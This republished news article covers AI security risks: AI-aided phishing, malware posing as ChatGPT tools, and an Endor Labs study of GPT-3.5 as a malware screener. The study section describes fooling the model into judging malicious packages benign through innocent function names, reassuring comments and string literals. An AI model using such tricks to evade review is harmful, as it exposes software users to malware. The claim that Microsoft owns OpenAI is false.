l White House addresses AI’s risks and rewards as security experts voice concerns about malicious use - TechRepublic - Business Telegraph
security

White House addresses AI’s risks and rewards as security experts voice concerns about malicious use – TechRepublic


Image: Shuo/Adobe Stock

The White House, last week, released a statement about the use of artificial intelligence, including large language models like ChatGPT.

The statement addressed concerns about AI being used to spread misinformation, biases and private data, and announced a meeting by Vice President Kamala Harris with leaders of ChatGPT maker OpenAI, owned by Microsoft and with executives from Alphabet and Anthropic.

But some security experts see adversaries who operate under no ethical proscriptions using AI tools on numerous fronts, including generating deep fakes in the service of phishing. They worry that defenders will fall behind.

Jump to:

Uses, misuses and potential over-reliance on AI

Artificial intelligence, “will be a huge challenge for us,” said Dan Schiappa, chief product officer at security operations firm Arctic Wolf.

“While we need to make sure legitimate organizations aren’t using this in an illegitimate way, the unflattering truth is that the bad guys are going to keep using it, and there is nothing we are going to do to regulate them,” he said.

According to security firm Zscaler, ThreatLabz’s 2023 Phishing Report, AI tools were partly responsible for a 50% increase in phishing attacks last year, compared to 2021. In addition, chatbot AI tools have allowed attackers to hone such campaigns by improving targeting and making it easier to trick users into compromising their security credentials.

AI in the service of malefactors isn’t new. Three years ago, Karthik Ramachandran, a senior manager at Deloitte in risk assurance, wrote in a blog that hackers had been using AI to create new cyber threats — the Emotet trojan malware targeting the financial services industry being one example. He also alleged in his post that Israeli entities had used it to fake medical results.

This year, malware campaigns have turned to generative AI technology according to a report from Meta. The report noted that since March, Meta analysts have found “…around 10 malware families posing as ChatGPT and similar tools to compromise accounts across the internet.”

Readers Also Like:  The EU Will Finally Free Windows Users From Bing - Slashdot

According to Meta, threat actors are using AI to create malicious browser extensions available in official web stores that claim to offer ChatGPT-related tools, some of which include working ChatGPT functionality alongside the malware.

“This was likely to avoid suspicion from the stores and from users,” shared Meta, which also said it detected and blocked over 1,000 unique, malicious URLs from being shared on Meta apps and reported them to industry peers at file-sharing services.

Common vulnerabilities

While Schiappa agreed that AI can exploit vulnerabilities with malicious code, he argued that the quality of the output generated by LLM is still hit and miss.

“There is a lot of hype around ChatGPT but the code it generates is frankly not great,” he said.

Generative AI models can, however, accelerate processes significantly, Schiappa said, adding that the “invisible” part of such tools — those aspects of the model not involved in natural language interface with a user — are actually more risky from an adversarial perspective and more powerful from a defense perspective.

Meta’s report said industry defensive efforts are forcing threat actors to find new ways to evade detection, including spreading across as many platforms as they can to protect against enforcement by any one service.

“For example, we’ve seen malware families leveraging services like ours and LinkedIn, browsers like Chrome, Edge, Brave and Firefox, link shorteners, file-hosting services like Dropbox and Mega, and more. When they get caught, they mix in more services including smaller ones that help them disguise the ultimate destination of links,” the report said.

For defense, AI is effective, within limits

With an eye to the capabilities of AI for defense, Endor Labs has recently studied AI models that can identify malicious packages focusing on source code and metadata.

In an April 2023 blog post, Henrik Plate, security researcher at Endor Labs described how the firm looked at defensive performance indicators for AI. As a screening tool, GPT-3.5 correctly identified malware only 36% of the time, correctly assessing only 19 of 34 artifacts from nine distinct packages that contained malware.

Readers Also Like:  Magos To Display AI-Powered Drone Detection Solution At GSX ... - SecurityInformed

Also, from the post:

  • 44% of the results were false positives.
  • By using innocent function names, AI was able to trick ChatGPT into changing an assessment from malicious to benign.
  • ChatGPT versions 3.5 and 4 came to divergent conclusions.

AI for defense? Not without humans

Plate argued that the results show LLM-assisted malware reviews with GPT-3.5 aren’t yet a viable alternative to manual reviews, and that LLM reliance on identifiers and comments may be valuable for developers, but they can also be easily misused by adversaries to evade the detection of malicious behavior.

“But even though LLM-based assessment should not be used instead of manual reviews, they can certainly be used as one additional signal and input for manual reviews. In particular, they can be useful to automatically review larger numbers of malware signals produced by noisy detectors (which otherwise risk being ignored entirely in case of limited review capabilities),” Plate wrote.

He described 1,800 binary classifications performed with GPT-3.5 that included false-positives and false-negatives, noting that classifications could be fooled with simple tricks.

“The marginal costs of creating and releasing a malicious package come close to zero,” because attackers can automate the publishing of malicious software on PyPI, npm and other package repositories, Plate explained.

Endor Labs also looked at ways of tricking GPT into making wrong assessments, which they were able to do using simple techniques to change an assessment from malicious to benign by, for example, using innocent function names, including comments that indicate benign functionality or through inclusion of string literals.

AI can play chess way better than it can drive a Tesla

Elia Zaitsev, chief technology officer at CrowdStrike said that a major Achilles heel for AI as part of a defensive posture is that, paradoxically, it only “knows” what is already known.

Readers Also Like:  Effectual Achieves SOC 2 Type 1 and Type 2 Compliance ... - PR Newswire

“AI is designed to look at things that have happened in the past and extrapolate what is going on in the present,” he said. He suggested this real-world analogy: “AI has been crushing humans at chess and other games for years. But where is the self-driving car?”

“There’s a big difference between those two domains,” he said.

“Games have a set of constrained rules. Yes, there’s an infinite combination of chess games, but I can only move the pieces in a limited number of ways, so AI is fantastic in those constrained problem spaces. What it lacks is the ability to do something never before seen. So, generative AI is saying ‘here is all the information I’ve seen before and here is statistically how likely they are to be associated with each other.’”

Zaitsev explained that autonomous cybersecurity, if ever achieved, would have to function at the yet-to-be-achieved level of autonomous cars. A threat actor is, by definition, trying to circumvent the rules to come up with new attacks.

“Sure there are rules, but then out of nowhere there’s a car driving the wrong way down a one-way street. How do you account for that,” he asked.

Adversaries plus AI

For attackers, there is little to lose from using AI in versatile ways because they can benefit from the combination of human creativity and AI’s ruthless 24/7, machine-speed execution, according to Zaitsev.

“So at CrowdStrike we are focused on three core security pillars: endpoint, threat intelligence and managed threat hunting. We know we need constant visibility of how adversary tradecraft is evolving,” he added.



READ SOURCE

This website uses cookies. By continuing to use this site, you accept our use of cookies.